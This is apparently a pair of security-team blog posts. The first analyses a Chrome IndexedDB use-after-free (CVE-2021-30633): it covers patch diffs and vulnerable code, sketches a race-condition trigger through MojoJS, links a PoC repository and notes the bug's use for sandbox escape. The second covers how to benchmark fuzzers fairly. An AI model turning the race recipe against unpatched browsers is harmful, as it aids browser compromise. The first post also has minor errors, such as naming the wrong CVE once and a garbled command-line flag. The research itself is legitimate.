 Proof-of-Concepts (PoCs) are a powerful tool for attackers. By reading and running a PoC, attackers can easily investigate the exploitability of a bug. PoCs are also useful for achieving more powerful exploits, such as Remote Code Execution (RCE) and Local Privilege Escalation (LPE).

 However, bug reports may not always include PoCs. Additionally, most bug reports regarding a product's security are kept private. For example, CVE-2021-30633 is a CVE assigned to a bug in Google Chrome on April 13, 2021. The Fuzzing Farm team investigated this bug in November 2021, but as of July 2023, the bug report is still private.

 If there is no access to a proof of concept (PoC), attackers must create their own. One of the responsibilities of the Fuzzing Farm team is to explore the exploitability of security bugs that are not publicly disclosed.

 This blog post explains the process of finding a patch corresponding to a specific CVE, analyzing it, and writing a PoC. We'll use CVE-2021-30551 as an example, which is a Use-after-Free vulnerability in Google Chrome as sufficient time passed since its bug fix.

CVE-2021-30633

 According to Google's official announcement regarding this CVE, the bug is described as follows:

High CVE-2021-30633: Use after free in Indexed DB API. Reported by Anonymous on 2021-09-08

 Reportedly, the vulnerability had already been fixed before Chromium 93.0.4577.82, but the bug report is still private.

 Before analyzing the patch, let's get an overview of the bug. What is "Indexed DB" in the announcement?

 IndexedDB is a data schema used to store data on the client-side (browser) and is supported on modern browsers, not just Chrome. This feature allows us to create, edit, and delete data on IndexedDB through the IndexedDB API. It is similar to the Web Storage API, but unlike Web Storage, IndexedDB can store not only string values but also structured data.

 IndexedDB has the following characteristics:

  • IndexedDB has a larger capacity compared to Web Storage. It can store more than a GiB if the client's storage has enough space.
  • IndexedDB can store not only strings but also JavaScript objects.
  • Most of the operations in IndexedDB are asynchronous. Notifications of the completion or error of an operation are passed through event handlers or Promises.
  • Transactions are used to access data in IndexedDB. Transactional operations are either finished by Commit or destroyed/rolled back by Abort.

 Since the Renderer process of the browser does not have the privilege to access local storage, every capital operation in IndexedDB is handled in the Browser process.

Analysing Patch and Bug

 To locate the vulnerable code corresponding to CVE-2021-30633, we searched the Chromium code base and studied some commits related to IndexedDB prior to Chromium 93.0.4577.82. We found the following 2 commits as a result:

 The first commit is a patch related to transactions in IndexedDB. The following code shows a portion of this patch:

@@ -87,6 +87,13 @@
     return;
   }
 
+  if (!transaction->IsAcceptingRequests()) {
+    mojo::ReportBadMessage(
+        "RenameObjectStore was called after committing or aborting the "
+        "transaction");
+    return;
+  }
+
   transaction->ScheduleTask(
       blink::mojom::IDBTaskType::Preemptive,
       BindWeakOperation(&IndexedDBDatabase::RenameObjectStoreOperation,

 This commit adds several branches to abort some operations after Commit. The second commit is a patch that ensures the integrity of the first patch and is not related to the bug itself.

@@ -295,8 +295,8 @@
     return;
 
   if (!transaction_->IsAcceptingRequests()) {
-    mojo::ReportBadMessage(
-        "Commit was called after committing or aborting the transaction");
+    // This really shouldn't be happening, but seems to be happening anyway. So
+    // rather than killing the renderer, simply ignore the request.
     return;
   }

 Figure 1 illustrates the flow of a typical transaction in IndexedDB.

  1. Create a transaction.
  2. Send a request, such as Get, Put, or Delete.
  3. Send a Commit request to actually execute the sequence of operations. (This is often run automatically, but the programmer can explicitly send a Commit request.)
  4. End the transaction.

 

Figure 1. The flow of a typical transaction in IndexedDB

 If we try to send a request from JavaScript API after Commit, an exception is thrown.

 If you try to request an operation after Commit from the JavaScript API, an exception will occur. However, if you make a request directly from Mojo 1, rather than from the JavaScript API, it should not be accepted, but you can send requests to the browser process as many times as you want.

 Here, let's take a look again at the code added by the patch in question.

  if (!transaction->IsAcceptingRequests()) {
    mojo::ReportBadMessage(
        "RenameObjectStore was called after committing or aborting the "
        "transaction");
    return;
  }

 Based on the method name, we can infer that this code aborts a transaction if the transaction no longer accepts any requests. Therefore, we can assume that the vulnerability occurs when an operation is requested after the transaction has been committed, which is when the transaction stops accepting requests.

Operation on Browser Process

 Database operations are not executed immediately upon request arrival; instead, they are first pushed to the task queue. The task queue is also used to wait for database requests until a Commit is requested.

 Figure 2 illustrates the flow of the Commit request. During the interval of each step, the Renderer process can send other requests.

  1. A Commit request arrives, and the is_commit_pending_ flag of the transaction is set.
  2. The commit operation begins. Some transactions execute CommitPhaseOne first, while others skip it and execute CommitPhaseTwo.
  3. CommitPhaseTwo is executed. The transaction's state is set to dead, and it is no longer processed.

 

Figure 2. Operations after a Commit request arrives

  Any request made after step 1 will be discarded if we apply the patch. The crash we discovered (explained later on) occurs between step 2 and 3, leading us to conclude that this is the bug corresponding to CVE-2021-30633.

Use-after-Free: CommitPhaseOne

 We will investigate the cause of the Use-after-Free vulnerability that is believed to correspond to CVE-2021-30633.

 IndexedDBBackingStore::Transaction::CommitPhaseOne is called when a Commit request arrives, and it handles the first phase of the Commit process. If external_object_change_map_ is not empty, this method writes data. external_object_change_map_ is a variable that holds external objects modified by the transaction. External objects are used to store file handles when an external file is used. This occurs when the File System Access API is called or when the data is too large to use a Blob.

 The writing process is implemented in IndexedDBBackingStore::Transaction::WriteNewBlobs with the following code (in content/browser/indexed_db/indexed_db_backing_store.cc).

for (auto& iter : external_object_change_map_) {
    for (auto& entry : iter.second->mutable_external_objects()) {
      switch (entry.object_type()) {
        case IndexedDBExternalObject::ObjectType::kFile:
        case IndexedDBExternalObject::ObjectType::kBlob:
        /* ... snipped ... */
        case IndexedDBExternalObject::ObjectType::kFileSystemAccessHandle: {
          if (!entry.file_system_access_token().empty())
            continue;
          // TODO(dmurph): Refactor IndexedDBExternalObject to not use a
          // SharedRemote, so this code can just move the remote, instead of
          // cloning.
          mojo::PendingRemote<blink::mojom::FileSystemAccessTransferToken>
              token_clone;
          entry.file_system_access_token_remote()->Clone(
              token_clone.InitWithNewPipeAndPassReceiver());

          backing_store_->file_system_access_context_->SerializeHandle(
              std::move(token_clone),
              base::BindOnce(
                  [](base::WeakPtr<Transaction> transaction,
                     IndexedDBExternalObject* object,
                     base::OnceCallback<void(
                         storage::mojom::WriteBlobToFileResult)> callback,
                     const std::vector<uint8_t>& serialized_token) {
                    // |object| is owned by |transaction|, so make sure
                    // |transaction| is still valid before doing anything else.
                    if (!transaction)
                      return;
                    if (serialized_token.empty()) {
                      std::move(callback).Run(
                          storage::mojom::WriteBlobToFileResult::kError);
                      return;
                    }
                    object->set_file_system_access_token(serialized_token);
                    std::move(callback).Run(
                        storage::mojom::WriteBlobToFileResult::kSuccess);
                  },
                  weak_ptr_factory_.GetWeakPtr(), &entry,
                  write_result_callback));
          break;
        }
      }
    }
  }

 Let's focus on the case IndexedDBExternalObject::ObjectType::kFileSystemAccessHandle in the switch statement. This block is executed when a value with a file handle is requested with Put.

 Here, a callback function is given as an argument to the backing_store_->file_system_access_context_->SerializeHandle call, and the raw pointer &entry is bound as an argument to the callback function.

 entry is an element of the value returned by mutable_external_object(), which is an element of external_object_change_map_. The summary of the variables is as follows:

  • external_object_change_map_
    • The instance of the IndexedDBExternalObjectChangeRecord class.
  • entry
    • A reference to a variable of type IndexedDBExternalObject.
  • mutable_external_objects():
    • Returns a reference to the member variable extern_objects_.
    • The type of extern_objects_ is std::vector<IndexedDBExternalObject>.

 If the memory region referenced by external_objects_ is modified after the callback is set, the pointer &enter becomes invalidated. This can lead to Use-after-Free issues in the following code. (Note that the variable object refers to the pointer entry.)

object->set_file_system_access_token(serialized_token);

 If this line of code is executed for an invalid entry, the program will try to write to invalid memory, potentially causing a Use-after-Free vulnerability.

Race Condition to Use-after-Free

 We need to free the memory pointed by external_objects_ in order to cause Use-after-Free. Let’s find a code that frees the address.

 IndexedDBBackingStore::Transaction::PutExternalObjects method is called if an IndexedDBValue is requested with Put with non-empty external_objects_.

 To cause the Use-after-Free, we need to free the memory pointed to by external_objects_. Let’s find a code to accomplish this.

 The IndexedDBBackingStore::Transaction::PutExternalObjects method is called when an IndexedDBValue is passed with a non-empty external_objects_ parameter in a Put request.

const auto& it = external_object_change_map_.find(object_store_data_key);
  IndexedDBExternalObjectChangeRecord* record = nullptr;
  if (it == external_object_change_map_.end()) {
    std::unique_ptr<IndexedDBExternalObjectChangeRecord> new_record =
        std::make_unique<IndexedDBExternalObjectChangeRecord>(
            object_store_data_key);
    record = new_record.get();
    external_object_change_map_[object_store_data_key] = std::move(new_record);
  } else {
    record = it->second.get(); // [1]
  }
  record->SetExternalObjects(external_objects); // [2]

 If the key of the Put request already exists in the database, it will go through the else clause [1], retrieve the existing record record, and then reach [2]. The SetExternalObjects method simply replaces the contents of external_objects_, that is, it replaces the existing data for the key with the new data.

void IndexedDBExternalObjectChangeRecord ::SetExternalObjects(
    std::vector<IndexedDBExternalObject>* external_objects) {
  external_objects_.clear();
  if (external_objects)
    external_objects_.swap(*external_objects);
}

 The clear method call invokes the destructor for each element of IndexedDBExternalObject. Additionally, the subsequent swap method swaps the pointers of member variable external_objects_ and argument external_objects. As a result, the old pointer is released when external_objects is destroyed. If the callback in question is called at this timing, it can lead to Use-after-Free.

PoC: Bug Reproduction

 To reproduce the crash, we need to make it possible to use Mojo from JavaScript to directly request operations from the Renderer to the Browser. Mojo is available from JavaScript when a feature called MojoJS is enabled, but this feature is disabled by default. Attackers usually enable this feature by exploiting vulnerabilities in the Renderer process. However, we can enable it by passing --enable=blink-features=MojoJS,MojoJSTest as command line arguments to Chrome, since this is an experiment for writing a PoC.

 We can cause the Use-after-Free vulnerability in the following steps:

  1. Send a Put request with an IDBValue that has a file handle.
  2. Send a Commit request. (This request can be sent before step 1 as it may cause a delay.)
  3. Send another Put request with an IDBValue that has the same key but a different external_objects set after WriteNewBlobs is called and before the callback is invoked.

 

Figure 3. The flow of race condition


 We repeat these steps until the race condition triggers a Use-after-Free vulnerability.

 To easily confirm the vulnerability, we can execute the PoC on Chromium compiled with AddressSanitizer. The resulting crash is shown in Figure 4.

Figure 4. Use-after-Free triggering a crash


 Based on this crash message, we can confirm that there is a Use-after-Free occurring in the code we have investigated. The PoC code is available in the gist link below.

https://github.com/RICSecLab/exploit-poc-public/tree/main/CVE-2021-30633

Conclusion

 This article explains the process from when an attacker investigates a CVE to writing a PoC. Once the PoC is written, the next step is to examine its exploitability. In this case, the vulnerability is useful for sandbox escape in Chrome when combined with exploiting the Renderer process and enabling Mojo in advance.

 Writing a PoC based on limited vulnerability information can be helpful in determining the exploitability and how we can achieve code execution.

 In the next article, we will cover the 0-day which the Fuzzing Farm team discovered and exploited.

 

1: A low-layer API used for communication between Renderer and Browser processes.

Friday, July 14, 2023

Fuzzing Farm #2: Evaluating Performance of Fuzzer

 Author: hugeh0ge

Introduction

 This article is Part 2 of the 4 blog posts in the Fuzzing Farm series. You can find the previous post at "Fuzzing Farm #1: Fuzzing GEGL with fuzzuf."

 As mentioned in Part 1, our Fuzzing Farm team uses our fuzzing framework, fuzzuf, to find software bugs. It's not just the Fuzzing Farm team that works with fuzzers in our company; many situations arise where we need to evaluate the performance of different fuzzers, both in the development of Fuzzuf itself and in other research.

 However, there is little organized documentation about evaluating fuzzers, and numerous pitfalls exist in benchmarking. Without careful evaluation, one may draw incorrect conclusions. Does greater code coverage mean better performance? Is a fuzzer that finds more crashes superior?

 Evaluating the performance of a fuzzer is a challenging task. Setting up the experiment properly and drawing useful conclusions can be very difficult. Unfortunately, even in academia, where experiments should adhere to scientific standards, researchers sometimes rush to conclusions in statistically incorrect ways, or fail to set up experiments in a way that the fuzzing community recommends.

 In this article, we provide some cautions and recommended experimental settings for evaluating the performance of fuzzers. These recommendations are based on our research and experience in performance evaluations.

Problems on Fuzzer Evaluation

 Before going over the general recommended experimental setup, we will first elaborate on some problems in the performance evaluation of fuzzers.

Ambiguity of Metrics

 The first challenge in evaluating the "performance" of a fuzzer is to establish an evaluation metric. While the aim of a fuzzer is typically to discover crashes (resulting from bugs or vulnerabilities), some people believe that the more crashes a fuzzer detects, the better its performance.

 However, consider the scenario where fuzzer A detects crashes p, q, and r, and fuzzer B detects crashes r and s. Can we conclude that fuzzer A is superior because it found one more crash than fuzzer B? In this case, we must also take into account the fact that fuzzer A could not find crash s (and similarly, fuzzer B could not find crashes p and q).

 Thus, if we want to assess fuzzer A's superiority based on this outcome alone, we should focus on evaluating fuzzers that can generally uncover a large number of crashes across a wide range of program-under-test (PUT), without considering the types of crashes that they can find.

 Moreover, it is important to note that if we rely on the number of crashes as an evaluation metric, crash deduplication must be as precise as possible. Since a mutation-based fuzzer generates many similar inputs, it creates a large number of inputs that trigger crashes on the same bugs.

 Generally, the fuzzer itself lacks the ability to pinpoint the cause of the crash and can only provide a simple classification. As a result, the number of inputs that cause crashes is frequently not equivalent to the number of bugs/vulnerabilities found.

 Consider an example where fuzzer A discovers 100 inputs that cause crash r, while fuzzer B identifies only one input that causes crash r. In this case, we cannot merely conclude that there is a difference of 99 in the number of crashes detected. (See Figure 1)


Figure 1. More crashes found in Fuzzer A, but all inputs are causing the same bug


 

 Moreover, a more fundamental problem is the duration of the experiment. Even if you run fuzzers on real-world software for several days, in most cases, you will only discover a few dozen bugs or vulnerabilities. Consequently, there is usually no significant difference between multiple fuzzers. Especially, if none of the fuzzers can detect any crashes, there is nothing to evaluate.

 For that reason, code coverage (the amount of code blocks, etc. that could be reached during fuzzing) is often used as an alternative. It is widely believed (*) that there is a correlation between code coverage and the potential number of crashes that a fuzzer can find, but it is not proportional. Therefore, it is not appropriate to rely solely on code coverage to determine the expected number of crashes.

 While it is generally true that higher code coverage increases the likelihood of finding a crash, it is not always the case. For example, if fuzzer A and B have similar code coverage but neither has found a crash, it is controversial to assume that fuzzer A is more likely to find crashes just because its code coverage is slightly higher.

 As mentioned above, it is important to pay attention to the values corresponding to the "y-axis," such as the number of crashes and code coverage, but it is also important to pay attention to the values corresponding to the "x-axis." When we compare the performance of fuzzers, the graph is often plotted with the time elapsed on the x-axis and the code coverage on the y-axis. However, depending on the element of interest, it may be better to set the x-axis to the number of PUT executions and compare the code coverage according to the number of PUT executions (see Figure 2).

 

Figure 2. Example graph showing the number of PUT executions on the x-axis (From EcoFuzz)

For instance, let's assume that you have applied some optimization to a fuzzer and you want to measure its effects. If the optimization aims to improve the execution speed, you should evaluate it on a graph with time as the x-axis. This is because the "probability of reaching a new code block in one PUT execution" remains unchanged even if the execution speed increases. Therefore, there should be no difference in the graph with the number of executions on the x-axis. In other words, a way to check for bugs in the implemented optimization is to observe if there is any change in the graph with the number of executions on the x-axis.

On the other hand, if you expect that the optimization will change the "probability of reaching a new code block in one PUT execution" due to new mutation algorithms or other factors, a graph with the number of executions on the x-axis will provide a more accurate evaluation than a graph with time on the x-axis. 1

Another important note on code coverage is that the size of code coverage is not directly proportional to the number of times a new code block is found. When a new code block is discovered, it is often the case that other new code blocks are also found at the same time due to subsequent processing beyond that block.

So, even if a fuzzer discovers 10,000 code blocks, it is natural that the fuzzer's hit coverage increases only around 1,000 times. Therefore, it is important to consider the special characteristics of each fuzzer when evaluating their performance.

For example, two fuzzers cannot be evaluated solely on the basis of whether they hit coverage increases frequently or less often. Other factors such as the actual code coverage achieved and the complexity of the conditions leading to the discovered paths should also be considered.

 As shown in Figure 3, both fuzzer A and B have the same code coverage value. 2 However, the number of coverage increases (number of new branches found) and paths reached are different. If fuzzer A can only reach the leftmost path due to poor mutation performance, fuzzer B is considered superior.

 On the other hand, if the conditions for reaching the leftmost path are very complex and the rest of the paths are uninteresting procedures such as error handling, then fuzzer A is considered superior for finding the important path. Moreover, depending on the Control Flow Graph (CFG), the code coverage of fuzzer A may be larger or smaller than that of fuzzer B. Therefore, comparisons of code coverage must take into account the unique characteristics of each fuzzer.

Figure 3. Fuzzer A and B show the same code coverage while the paths found are different
 

Uncertainty of the Fuzzer

 While a fuzzer generates or mutates test cases, it draws random numbers to produce many different inputs. Since it relies on these random numbers, its behavior is subject to uncertainty. 3 Furthermore, the performance of the fuzzer will depend on how long it runs and the type of PUT. Let’s discuss the problems caused by such uncertainty.

 Figure 4 shows the results of some experiments from fuzzbench. The horizontal axis represents the elapsed time, and the vertical axis represents the code coverage (Code Region) at that point. The number of instances running each fuzzer is 14. The thick line with dots represents the average value of the code coverage, and the areas above and below show the 95% confidence interval.

Figure 4. Coverage of various fuzzers measured for 23 hours

 Based on the graph, we can conclude that aflplusplus_optimal achieves the largest code coverage with a high probability at the end of the 23-hour experiment, both in terms of the mean value and the confidence interval. However, if we had stopped the experiment at 12 hours, the mean value of aflplusplus_optimal would not even come close to that of afl.

 Since the increase in coverage is time series data and the trend of the increase is different for each fuzzer, it is impossible to determine whether the fuzzer that is considered the best at a given time will also be the best further down the road.

 Having a time series also presents other problems. As mentioned earlier, fuzzers behave randomly, so even if you fuzz the exact same PUT with the same settings, different sources of random numbers can produce very different results. As an example, refer to the graph from the following tweet discussing this issue.

Figure 5. Coverage of each of the 20 measurements on one instance

 This graph shows the change in coverage when the same fuzzer (aflfast) is run on the same machine 20 times, with time on the horizontal axis and coverage on the vertical axis.

 From the graph, it is evident that evaluating performance with a small number of instances is risky. Evaluating each fuzzer with only one instance is roughly equivalent to randomly selecting just one curve from the 20 curves in this graph and looking at it alone. The average behavior of the fuzzer expected from that one curve would be very different from the average behavior expected from all 20 of these curves.

 Let's compare the fuzzbench graph that shows only the mean and confidence interval (Figure 4) with the graph that shows the coverage of the actual 20 instances (Figure 5). Although there are differences in measurement time and PUT, the mean value and confidence interval tend to increase smoothly. On the other hand, the coverage of individual instances shows more staircase-like changes.

 This is because there are many periods when the fuzzer cannot find a new code block and becomes stuck. As a result, there are periods of time when code coverage does not change for a certain period, causing a plateau (flat area) on the graph. Unless all instances exit the plateau at about the same time, it is unlikely for data such as averages to be stair-stepped.

 Therefore, when looking at graphs that show only means and variances, it is sometimes important to keep in mind that the actual coverage of each instance may be a staircase of extremes.

Strong Dependence on Configurations

It is important to note that the performance of a fuzzer can (seemingly) change significantly with just one different experimental setting.

The setting that produces the most noticeable change is the PUT used. Figures 6.1 through 6.3 show the results for several PUTs in the fuzzbench experiment.

 

Figure 6.1. Coverage with freetype2-2017 as PUT


Figure 6.2. Coverage with bloaty_fuzz_target as PUT



Figure 6.3. Coverage with lcms-2017-03-21 as PUT


 These figures demonstrate that the fuzzers with the highest coverage in 23 hours differ from PUT to PUT.

 Moreover, the same PUT may elicit completely different fuzzer behavior depending on the software version and build. Specifically, the method of instrumentation4 may significantly impact the performance.

 The two most variable settings in fuzz testing are the initial seed and the dictionary. To illustrate this point, let's compare a situation where there is no suitable initial seed for a PUT that parses PDF files to one where a single PDF file is provided as the initial seed.

 Without an initial seed PDF file, it is unlikely that the fuzzer will be able to reach code blocks beyond the header checks without first identifying the header (and trailer) of the PDF file format. Additionally, without identifying the format of the object and xref that constructs the PDF file, it is impossible to test the routines processing these structures. It is easy to see that the probability of the fuzzer, which only adds relatively simple random mutations, discovering these formats by chance is very low.

 On the other hand, if a decent PDF file is given as a seed, there is no need to find the object or xref structure by fuzzing, nor is there a risk of getting stuck in header validation. Additionally, PDF files may contain other embedded formats, such as JavaScript or Color Profile. If we suppose that the less a fuzzer know about the format, the harder it is to continue PUT execution without error and find new code blocks, then giving a diverse set of initial seeds, including ones with other embedded formats, can be very beneficial.

 The same principle applies to dictionaries. Including keywords such as %PDF-1.6, %%EOF, /Parent, and xref in the dictionary increases the likelihood that the associated code blocks will be executed. If these keywords are not present, we can only hope that they will be produced by chance during random string generation

 Therefore, even if the fuzzer is the same, the difference in prior knowledge given in advance often leads to differences in performance and completely different results.

 In addition to initial seeds and dictionaries, there are other ways to provide a fuzzer with prior knowledge. One such way is to adjust hyperparameters. A fuzzer typically has many parameters, which are usually in the form of macros or other compile-time specifications. For example, the AFL family has a hyperparameter called MAX_FILE, which limits the file size generated by the fuzzer. By default, this value is set to 1 MB, which is large enough to generate files of varying sizes. However, if we know that "PUT only accepts input up to 100 bytes and discards any input larger than that," we can lower this parameter to 100. This will reduce the possibility of generating meaningless input and lead to more efficient fuzzing. Even a small change in a single parameter can significantly increase or decrease performance.

 We have explained that the performance of the same fuzzer can vary significantly depending on the presence or absence of prior knowledge. So, how does prior knowledge affect the performance of different fuzzers?

 To ensure a fair performance evaluation, it is important to maintain the same initial seeds or dictionaries for each fuzzer. By making the experimental conditions as uniform as possible, we can create a valid experimental setting. Whether we start with no initial seed or use 10,000 initial seeds, applying the same conditions to all fuzzers will produce a valid experiment.

 However, it is surprising that in some experimental settings, the dominance of the fuzzer can be reversed. For example, consider two settings: one with no decent initial seeds, and another with decent enough initial seeds.

 In the first setting, where there are no decent initial seeds, fuzzers with relatively simple random mutations are likely to get stuck. In such a situation, only fuzzers using special algorithms, such as REDQUEEN and concolic fuzzers that have SMT solvers, can reach new code blocks and get out of the plateau.

 On the other hand, in a setting with decent initial seeds, it is quite possible to handle the case where you have to generate a specific keyword to get out of the plateau even if only random mutation is used. Not only does the initial seed have the keyword, but cloning and splicing mutations that copy bytes from other seeds also increase the likelihood that the newly generated input will have the keyword.

 In other words, the presence of the initial seed has a certain dictionary-like effect. Therefore, special fuzzers may perform better in the first setting, while fuzzers with simple random mutations may perform better in the second setting.

 So what is the best experimental setting?

 As with the discussion on PUT selection, there is no single correct answer for seed selection. It is best to choose a setting that closely imitates the actual situation in which the fuzzer will be used.

 For instance, if the input format is a commonly used one, like a PDF file, there are already initial seeds and dictionaries publicly available that have been optimized over the years. Since these seeds are expected to be used by anyone, it is acceptable to use them for performance evaluation.

 On the other hand, if the fuzzer is expected to run in circumstances where prior knowledge is not available, it is reasonable to benchmark in a situation that does not provide prior knowledge. It is important to clearly indicate the purpose of the fuzzer being evaluated and the assumptions made when constructing the experimental setting.

 In addition, it is noteworthy that experimental settings are not limited to explicit parameters that can bring about changes. The following is a portion of the AFL code:

/* Let's keep things moving with slow binaries. */

  if (avg_us > 50000) havoc_div = 10;     /* 0-19 execs/sec   */
  else if (avg_us > 20000) havoc_div = 5; /* 20-49 execs/sec  */
  else if (avg_us > 10000) havoc_div = 2; /* 50-100 execs/sec */

.....

  stage_max   = (doing_det ? HAVOC_CYCLES_INIT : HAVOC_CYCLES) *
                  perf_score / havoc_div / 100;

.....

/* We essentially just do several thousand runs (depending on perf_score)
     where we take the input file and make random stacked tweaks. */

  for (stage_cur = 0; stage_cur < stage_max; stage_cur++) {

 The code determines how many times to mutate a single seed based on the number of times the PUT can be executed per second. In other words, fuzzing the same PUT with the same fuzzer and experimental settings may exhibit different behavior and produce different results depending on the machine used for the experiment, differences in CPU load, and many other factors. Essentially, a pure fuzzing algorithm should behave consistently regardless of the machine used, but this inconsistency may be caused by optimization for practicality. Therefore, it is important to make efforts to keep not only the experimental setup but also the experimental environment as identical as possible.

Recommended Experimental Setup

 In light of the issues raised thus far, we will discuss some recommended experimental settings.

Set up a hypothesis

 As with all scientific experiments, it is advisable to avoid conducting experiments without a hypothesis. We should only conduct experiments after clearly defining what we want to demonstrate or confirm. In many cases, experiments without a hypothesis can lead to meaningless results or biases in observation, making it easy to focus on spurious correlations.

Make an evaluation metric

 To begin, you must decide which metric to use as the evaluation metric. This can be the number of crashes, code coverage, or some other metric.

 If you choose to use the number of crashes, we recommend using MAGMA as the evaluation dataset. Currently, MAGMA is widely recognized as a dataset that allows for complete deduplication of crashes found. If you are unable to use the MAGMA dataset for evaluating the number of crashes, it is necessary to provide a mechanism to deduplicate crashes with the highest possible accuracy. For instance, the deduplication algorithm implemented in the AFL family is very inaccurate and almost useless.

Choosing PUTs and configurations

 Unless you have a special motivation, such as debugging purposes, you should always prepare multiple PUTs for performance evaluation. In the author’s experience, it is advisable to use at least 3 PUTs when experimenting with a specific input format (i.e., when you have a hypothesis such as "I want to show that this fuzzer is good at fuzzing PDF viewer") and 6 or more when experimenting with any input format. Experimental results with fewer than 6 PUTs may appear to have some kind of tendency by chance, which is a weak argument for performance evaluation. The paper "On the Reliability of Coverage-Based Fuzzer Benchmarking [1]" states that we should prepare at least 10 programs.

 The PUT used for testing fuzzers should ideally be a large software program, such as a well-known open-source program used in the real world. Using a self-written or small program with only a few dozen or a few hundred lines of code is not recommended5. This is because fuzzers are generally intended to be practical.

 It is also important to select the PUT as randomly as possible to reduce selection bias and eliminate arbitrariness. If you want to impose conditions on the PUT, such as being a well-known OSS, it is recommended to first create a set of PUTs that meet the conditions and then randomly select some of them.

 After selecting the PUTs, you must adjust the configurations for each PUT, including the initial seeds, dictionary, and other available parameters. It is recommended that you carefully consider these configurations to obtain the most practical results possible. If possible, you can use AFL's preset dictionaries or choose an existing corpus that appears to be suitable initial seeds (e.g., https://github.com/mozilla/pdf.js/tree/master/test/pdfs).

Choosing the experimental environment and duration

 Before starting the experiment, you need to set up the experiment environment, determine the duration of the experiment, and decide on the number of machine instances. It is important to consider factors such as the number of PUTs, deadline, available funds, and computing resources. Although it is difficult to determine the ideal values, we will first explain the optimal conditions and then discuss where we can make concessions.

 To ensure accurate results, it is recommended that all machines used in the experiments be as identical as possible. For example, you can run all experiments on the same machine or use the same resource instance in a SaaS environment.

 Regarding the period of the experiment, as mentioned previously, there is a problem: we do not know whether the fuzzer that is considered the best at a given time will also be the best when more time elapses. In extreme cases, even if you run the fuzzer for a very long time, you cannot eliminate this concern.

 However, intuitively, the longer you run the fuzzer, the less likely it is that such a reversal will occur. In reference [1], based on empirical experiments, it is recommended to run the experiment for at least 12 hours, and usually for 24 hours or more.

 The number of instances will affect the statistical tests described in the next section, "Statistical Evaluation." Intuitively, one might think that having more instances would lead to a more accurate prediction of the average behavior of the fuzzer. Reference [1] recommends using at least 10 instances, but preferably 20 or more.

 Let's now calculate the time required for the experiment. To put it simply, the CPU time required for an experiment can be calculated as follows:

(Required Time [h])
= (# of PUTs) x (# of Instances) x (Time of Experiment [h]) x (# of Fuzzer to Compare with)

 If we were to adopt the numbers recommended in [1] for everything, including a single fuzzer, we would need an extremely large amount of resources and time: 10 x 20 x 1[d] = 20[CPU-day]. Therefore, in many cases, we must make some concessions.

 First, in the author’s opinion, the duration of the experiment should not be shorter than 24 hours. When possible, it should be extended beyond 24 hours. Some may think that it is nonsensical to set a limit on the time because the number of PUTs executed in the same amount of time depends on the CPU's performance and the number of parallel instances. However, in our experience with DGX, which consists of more powerful CPUs than typical consumer CPUs, the majority of instances continue to increase coverage even after 24 hours. Considering that sometimes increased coverage revealed new tendencies, it is recomended to run for a minimum of 24 hours in any environment.

 It may be possible to save time by running multiple instances on a single machine. However, the following points should be noted:

  • Ensure that the machine is not overloaded.
    • Monitor the frequency of PUT executions per second and keep it at a reasonable level.
    • There is no standard for the exact frequency of PUT executions. For instance, you may use CPUs with performance similar to those used in standard benchmarks such as fuzzbench.
    • Usually, fuzzers are likely to have no problem running their instances in parallel up to the same number of physical cores6. However, even running only one instance on a single physical core can result in low performance sometimes. In particular, when several hundred instances are set up on a machine with several hundred cores, some operations such as fork become very slow, to the point where the experiment can be pointless. It is inevitable that the more processes you create, the heavier the OS processing becomes, and this is a limitation of the OS. Therefore, the number of instances should be determined with a margin.
     
  • Avoid running different (comparing) fuzzers at the same time.
    • This is to ensure that the load of fuzzer A does not have an adverse effect on fuzzer B.
    • In some avoidable situations, where measured data is not susceptible to an adverse effect and is not to be published in a paper (data for internal use, etc.), it is acceptable to run them at the same time. However, this should always be clearly stated.

 If you have limited computing resources, you may use multiple machines as long as each PUT is performed on a unified machine. For example, PUT X should run on machine A while PUT Y runs on machine B

 In cases where you are not planning to submit a paper and reducing the number of PUTs is unavoidable, you may consider using less than 10 PUTs. However, as stated earlier, it is recommended to use at least 6 PUTs whenever possible. If you decide to use fewer PUTs, you must be very careful of confirmation bias.

Statistical Evaluation

 This is the most challenging part. Unfortunately, many papers fail to conduct statistically correct evaluations. Since fuzzing campaigns can be considered as random time series data, it is reasonable to compare them using statistical methods to determine whether they are effective or not. Ultimately, what is being discussed here is the general difficulty of doing statistical tests right, not just in the context of fuzzing. A detailed explanation of this point would require a solid mathematical background and would be beyond the scope of this article. Therefore, we will only describe some common mistakes often observed in this field.

  • Nonparametric tests must be used.
    • Intuitively, the randomness of a fuzzing campaign does not exhibit good properties such as following a normal distribution. Therefore, few assumptions should be made about the distribution. In other words, it is appropriate to use nonparametric methods.
    • Most papers follow this rule.
  • The significance level α should be strict enough, and the number of samples should be sufficient.
    • The significance level α serves as the threshold for the p-value. In simple terms, α is a value that represents the probability of a hypothesis being false when the test result indicates true (or vice versa by reversing the result to 1-α).
    • The setting of α is free, so there are various de facto standards depending on the field. In the fuzzing community, p < 0.05 is common. In the author’s opinion, p < 0.01 should be used, but this is a personal belief and not a problem. However, it is not allowed to decide α after looking at the results of statistical tests. In recent years, there seems to be a trend, among some people that probably feel setting α meaningless, of simply displaying the p-value without setting α
    • Nonparametric tests require fewer assumptions than parametric tests and typically require more information (= sample size). On the other hand, fuzzing campaigns are very heavy on each trial and it is difficult to increase the number of instances, making it difficult to obtain significant results. (That's why fraud such as changing p-values later occurs.) For example, there may be a huge difference in the test between 10 and 20 instances.
  • Multiple testing problem should be properly solved.
    • Unfortunately, there are not many papers that handle this issue correctly7. It is difficult to handle the problem properly including the sample size. As a result, the results appear to be ambiguous in many papers.

 The test commonly used in fuzzing research papers is the Mann-Whitney U test. However, this test can only determine whether two groups follow different distributions or whether the rank sum of one group is significantly better than that of another group. It generally cannot determine whether the mean or median of one group is significantly higher than that of another group.

 Furthermore, within the fuzzing community, the Brunner-Munzel test is more suitable and has a higher detection ability than the Mann-Whitney U test. However, there seems to be no discussion about this, and the Mann-Whitney U test is becoming the de facto standard, as papers recommending it are being cited.

 Thus, there are many aspects to consider when comparing fuzzers for each PUT (range where statistical methods can be applied). Drawing conclusions across PUTs is even more challenging.

 Drawing a conclusion like "fuzzer A has these characteristics" is difficult because even if the same fuzzer is used, each PUT shows completely different tendencies and results. Additionally, the impact of PUT on the fuzzer's performance cannot be modeled by formulas or any other means. Furthermore, since only a few dozen PUTs are used in experiments, each with different characteristics, statistical methods cannot be applied.

